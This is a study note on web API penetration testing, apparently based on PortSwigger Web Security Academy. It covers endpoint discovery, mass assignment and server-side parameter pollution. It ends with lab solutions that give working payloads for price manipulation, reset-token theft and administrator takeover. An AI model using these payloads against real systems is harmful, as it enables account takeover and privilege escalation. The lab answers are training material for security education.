# API testing

## API Recon

- The input data the API processes, including both compulsory and optional parameters.
- The types of requests the API accepts, including supported HTTP methods and media formats.
- Rate limits and authentication mechanisms.

## **Discovering** API documentation

Look for endpoints that may refer to API documentation

- `/api`
- `/swagger/index.html`
- `/openapi.json`

[OpenAPI Parser](https://portswigger.net/bappstore/6bf7574b632847faaaa4eb5e42f1757c)

[https://github.com/z5jt/API-documentation-Wordlist/blob/main/API-Documentation-Wordlist/api-documentation-endpoint.txt](https://github.com/z5jt/API-documentation-Wordlist/blob/main/API-Documentation-Wordlist/api-documentation-endpoint.txt)

## Identifying and interacting with API endpoints

While browsing the application, look for patterns that suggest API endpoints in the URL structure, such as `/api/`. Also look out for JavaScript files. These can contain references to API endpoints that you haven't triggered directly via the web browser. Burp Scanner automatically extracts some endpoints during crawls, but for a more heavyweight extraction, use the [JS Link Finder](https://portswigger.net/bappstore/0e61c786db0c4ac787a08c4516d52ccf) BApp. 

[JS Link Finder](https://portswigger.net/bappstore/0e61c786db0c4ac787a08c4516d52ccf)

### **Interacting with API endpoints**

- Identifying API endpoints
- Interacting with API endpoints
    - investigate how the API responds to changing the HTTP method and media type
- Identifying supported HTTP methods
    - Test all potential methods when you’re investigating API endpoints. use the built-in **HTTP verbs** list in Burp Intruder to automatically cycle through a range of methods.
        - `GET /api/tasks` - Retrieves a list of tasks.
        - `POST /api/tasks` - Creates a new task.
        - `DELETE /api/tasks/1` - Deletes a task.
        - `PATCH /api/tasks` - Applies partial changes to a task.
        - `OPTIONS /api/tasks` - Retrieves information on the types of request methods.
- Identifying supported content types
    - Changing the content type may enable:
        - Trigger errors that disclose useful information.
        - Bypass flawed defenses.
        - Take advantage of differences in processing logic. For example, an API may be secure when handling JSON data but susceptible to injection attacks when dealing with XML.
- Using Intruder to find hidden endpoints
    - To identify hidden endpoints, use Burp Intruder to find other resources with the same structure
        - `PUT /api/user/update`
        - `PUT /api/user/add`
        - `PUT /api/user/...`

[Content Type Converter](https://portswigger.net/bappstore/db57ecbe2cb7446292a94aa6181c9278)

## Finding hidden parameters

When you're doing API recon, you may find undocumented parameters that the API supports. You can attempt to use these to change the application's behavior. Burp includes numerous tools that can help you identify hidden parameters:

- Burp Intruder enables you to automatically discover hidden parameters, using a wordlist of common parameter names to replace existing parameters or add new parameters. Make sure you also include names that are relevant to the application, based on your initial recon.
- The [Param miner](https://portswigger.net/bappstore/17d2949a985c4b7ca092728dba871943) BApp enables you to automatically guess up to 65,536 param names per
request. Param miner automatically guesses names that are relevant to the application, based on information taken from the scope.
- The [Content discovery](https://portswigger.net/burp/documentation/desktop/tools/engagement-tools/content-discovery) tool enables you to discover content that isn't linked from visible content that you can browse to, including parameters.

### Mass assignment vulnerabilities

Mass assignment (also known as auto-binding) can inadvertently create hidden parameters. It occurs when software frameworks automatically bind request parameters to fields on an internal object. Mass assignment may therefore result in the application supporting parameters that were never intended to be processed by the developer. 

Since mass assignment creates parameters from object fields, you can often identify these hidden parameters by manually examining objects returned by the API.

For example, consider a `PATCH /api/users/` request, which enables users to update their username and email, and includes the following JSON:

```json
{
    "username": "wiener",
    "email": "wiener@example.com",
}
```

A concurrent `GET /api/users/123` request returns the following JSON:

```json
{
    "id": 123,
    "name": "John Doe",
    "email": "john@example.com",
    "isAdmin": "false"
}
```

This may indicate that the hidden `id` and `isAdmin` parameters are bound to the internal user object, alongside the updated username and email parameters.

To test whether you can modify the enumerated `isAdmin` parameter value, add it to the `PATCH` request:

```json
{
    "username": "wiener",
    "email": "wiener@example.com",
    "isAdmin": true,
}
```

## Server-side parameter pollution

Some systems contain internal APIs that aren't directly accessible from the internet. Server-side parameter pollution occurs when a website embeds user input in a server-side request to an internal API without adequate encoding. This means that an attacker may be able to manipulate or inject parameters, which may enable them to, for example:

- Override existing parameters.
- Modify the application behavior.
- Access unauthorized data.

Test any user input for any kind of parameter pollution. For example, query parameters, form fields, headers, and URL path parameters may all be vulnerable. 

## **Testing for server-side parameter pollution in the query string**

To test for server-side parameter pollution in the query string, place query syntax characters like `#`, `&`, and `=` in your input and observe how the application responds.

- & - %26
- = - %3d
- ? - %3f

Consider a vulnerable application that enables you to search for other users based on their username. When you search for a user, your browser makes the following request: 

`GET /userSearch?name=peter&back=/home`

 To retrieve user information, the server queries an internal API with the following request: 

`GET /users/search?name=peter&publicProfile=true`

### **Truncating query strings**

Use a URL-encoded `#` character to attempt to truncate the server-side request. To help you interpret the response, you could also add a string after the `#` character.

For example, modify the query string to the following:

`GET /userSearch?name=peter%23foo&back=/home`

 The front-end will try to access the following URL: 

`GET /users/search?name=peter#foo&publicProfile=true`

Review the response for clues about whether the query has been truncated. For example, if the response returns the user `peter`, the server-side query may have been truncated. If an `Invalid name` error message is returned, the application may have treated`foo` as part of the username. This suggests that the server-side request may not have been truncated

If you're able to truncate the server-side request, this removes the requirement for the `publicProfile` field to be set to true. You may be able to exploit this to return non-public user profiles.

<aside>
💡

It's essential that you URL-encode the `#` character. Otherwise the front-end application will interpret it as a fragment identifier and it won't be passed to the internal API.
    

</aside>

### **Injecting invalid parameters**

Use an URL-encoded `&` character to attempt to add a second parameter to the server-side request.

 For example, modify the query string to the following: 

`GET /userSearch?name=peter%26foo=xyz&back=/home`

 This results in the following server-side request to the internal API: 

`GET /users/search?name=peter&foo=xyz&publicProfile=true`

Review the response for clues about how the additional parameter is parsed. For example, if the response is unchanged this may indicate that the parameter was successfully injected but ignored by the application. 

### **Injecting valid parameters**

Modify the query string to add a second valid parameter to the server-side request. 

For example, if `email` parameter is identified, add it to the query string as follows:
`GET /userSearch?name=peter%26email=foo&back=/home`

 This results in the following server-side request to the internal API: 

`GET /users/search?name=peter&email=foo&publicProfile=true`

 Review the response for clues about how the additional parameter is parsed. 

### **Overriding existing parameters**

To confirm whether the application is vulnerable to server-side parameter pollution, try to override the original parameter. Do this by injecting a second parameter with the same name. 

 For example, modify the query string to the following: 

`GET /userSearch?name=peter%26name=carlos&back=/home`

This results in the following server-side request to the internal API: 

`GET /users/search?name=peter&name=carlos&publicProfile=true`

The internal API interprets two `name` parameters. The impact of this depends on how the application processes the second parameter. This varies across different web technologies. For example:

- PHP parses the last parameter only. This would result in a user search for `carlos`.
- ASP.NET combines both parameters. This would result in a user search for `peter,carlos`, which might result in an `Invalid username` error message.
- Node.js / express parses the first parameter only. This would result in a user search for `peter`, giving an unchanged result.

If you're able to override the original parameter, you may be able to conduct an exploit. For example, you could add`name=administrator` to the request. This may enable you to log in as the administrator user.

## **Testing for server-side parameter pollution in REST paths**

A RESTful API may place parameter names and values in the URL path, rather than the query string. For example, consider the following path:

`/api/users/123`

The URL path might be broken down as follows:

- `/api` is the root API endpoint.
- `/users` represents a resource, in this case `users`.
- `/123`represents a parameter, here an identifier for the specific user.

Consider an application that enables you to edit user profiles based on their username. Requests are sent to the following endpoint: 

`GET /edit_profile.php?name=peter`

This results in the following server-side request: 

`GET /api/private/users/peter`

An attacker may be able to manipulate server-side URL path parameters to exploit the API. To test for this vulnerability, add path traversal sequences to modify parameters and observe how the application responds. 

Submit URL-encoded `peter/../admin` as the value of the `name` parameter:
`GET /edit_profile.php?name=peter%2f..%2fadmin`

 This may result in the following server-side request: 

`GET /api/private/users/peter/../admin`

If the server-side client or back-end API normalize this path, it may be resolved to `/api/private/users/admin`.

## **Testing for server-side parameter pollution in structured data formats**

An attacker may be able to manipulate parameters to exploit vulnerabilities in the server's processing of other structured data formats, such as a JSON or XML. To test for this, inject unexpected structured data into user inputs and see how the server responds. 

Consider an application that enables users to edit their profile, then applies their changes with a request to a server-side API. When you edit your name, your browser makes the following request: 

```markdown
POST /myaccount
Content-type: application/x-www-form-urlencoded

name=peter
```

 This results in the following server-side request: 

```json
PATCH /users/7312/update
Content-type: application/json

{"name":"peter"}
```

You can attempt to add the `access_level` parameter to the request as follows:

```json
POST /myaccount
Content-type: application/x-www-form-urlencoded

name=peter","access_level":"administrator
```

If the user input is added to the server-side JSON data without adequate validation or sanitization, this results in the following server-side request: 

```json
PATCH /users/7312/update
Content-type: application/json

{name="peter","access_level":"administrator"}
```

This may result in the user `peter` being given administrator access.

---

Consider a similar example, but where the client-side user input is in JSON data. When you edit your name, your browser makes the following request: 

```json
POST /myaccount
Content-type: application/json

{"name": "peter"}
```

 This results in the following server-side request: 

```json
PATCH /users/7312/update
Content-type: application/json

{"name":"peter"}
```

You can attempt to add the `access_level` parameter to the request as follows:

```json
POST /myaccount
Content-type: application/json

{"name": "peter\",\"access_level\":\"administrator"}
```

 If the user input is decoded, then added to the server-side JSON data without adequate encoding, this results in the following server-side request: 

```json
PATCH /users/7312/update
Content-type: application/json

{"name":"peter","access_level":"administrator"}
```

Again, this may result in the user `peter` being given administrator access.

## **Testing with automated tools**

Burp includes automated tools that can help you detect server-side parameter pollution vulnerabilities.

Burp Scanner automatically detects suspicious input transformations when performing an audit. These occur when an application receives user input, transforms it in some way, then performs further processing on the result. This behavior doesn't necessarily constitute a vulnerability, so you'll need to do further testing using the manual techniques outlined above. For more information, see the [Suspicious input transformation](https://portswigger.net/kb/issues/00400d00_suspicious-input-transformation-reflected) issue definition.

You can also use the Backslash Powered Scanner BApp to identify server-side injection vulnerabilities. The scanner classifies inputs as boring, interesting, or vulnerable. You'll need to investigate interesting inputs using the manual techniques outlined above. For more 
information, see the [Backslash Powered Scanning: hunting unknown vulnerability classes](https://portswigger.net/research/backslash-powered-scanning-hunting-unknown-vulnerability-classes) whitepaper.

[Web Security Academy alignment with the OWASP Top 10 API vulnerabilities | Web Security Academy](https://portswigger.net/web-security/api-testing/top-10-api-vulnerabilities)

---

### Extensions

- JS Link Finder BApp
- OpenAPI Parser
- Param Miner
- Content type converter BApp
- Backslash Powered Scanner

### Labs

[Lab: Exploiting an API endpoint using documentation](https://portswigger.net/web-security/api-testing/lab-exploiting-api-endpoint-using-documentation)

`Directory - ***/api***`

`Endpoint - ***DELETE*** ***/api/user/carlos***`

[**Lab: Finding and exploiting an unused API endpoint**](https://portswigger.net/web-security/api-testing/lab-exploiting-unused-api-endpoint)

`HTTP Methods Fuzzing - Note that ***PATCH*** method is available`

`Change ***Content-Type*** to ***application/json***`

`Set Invalid JSON body to get parameter name, required to set new price to the item.`

[**Lab: Exploiting a mass assignment vulnerability**](https://portswigger.net/web-security/api-testing/lab-exploiting-mass-assignment-vulnerability)

```markdown
# Check /api page which reveals additioanal parameter for POST /checkout endpoint
# Send the following hidden parameter to get discount on POST /checkout

POST /api/checkout

{
  "chosen_discount": {
    "percentage": 100
  },
  "chosen_products": [
    {
      "product_id": "1",
      "quantity": 1
    }
  ]
}
```

[Lab: Exploiting server-side parameter pollution in a query string](https://portswigger.net/web-security/api-testing/server-side-parameter-pollution/lab-exploiting-server-side-parameter-pollution-in-query-string)

```markdown
# Change password to Administrator user and note POST /forgot-password method
# Truncate the parameter and note the error, suggest to use field parameter
POST /forgot-password HTTP/2

csrf=token&username=administrator%23
# While crawling the website, note forgotPassword.js, which expose reset_token parameter to the URL Query
# Send the following request to get reset_token for administrator user
POST /forgot-password HTTP/2

csrf=token&username=administrator%26field=reset_token%23
# Change the password using gathered reset_token
```

[Lab: Exploiting server-side parameter pollution](https://portswigger.net/web-security/api-testing/server-side-parameter-pollution/lab-exploiting-server-side-parameter-pollution-in-rest-url)

```markdown
# Change password to Administrator user and note POST /forgot-password method
# Truncate the parameter and note error, indicating presense of API Definition
POST /forgot-password HTTP/2

csrf=token&username=administrator%23
# Add path traversal sequence and note the response
POST /forgot-password HTTP/2

csrf=token&username=administrator/../nonexituser
# Incrementally add further ../ sequences until reach Not Found error
POST /forgot-password HTTP/2

csrf=token&username=administrator/../../../../%23
# At this level, add some common API definition filenames to the URL path. For example: openapi.json 
POST /forgot-password HTTP/2

csrf=token&username=administrator/../../../../openapi.json%23
#  Notice that this returns an error message, which contains the following API endpoint for finding users:  /api/internal/v1/users/{username}/field/{field} 
# While crawling the website, note forgotPassword.js, which expose passwordResetToken parameter to the URL query
# Send the following request to get reset token of administrator user
POST /forgot-password HTTP/2

csrf=token&username=administrator/../../../../../api/internal/v1/users/administrator/field/passwordResetToken%23
# Change the password using gathered passwordResetToken
```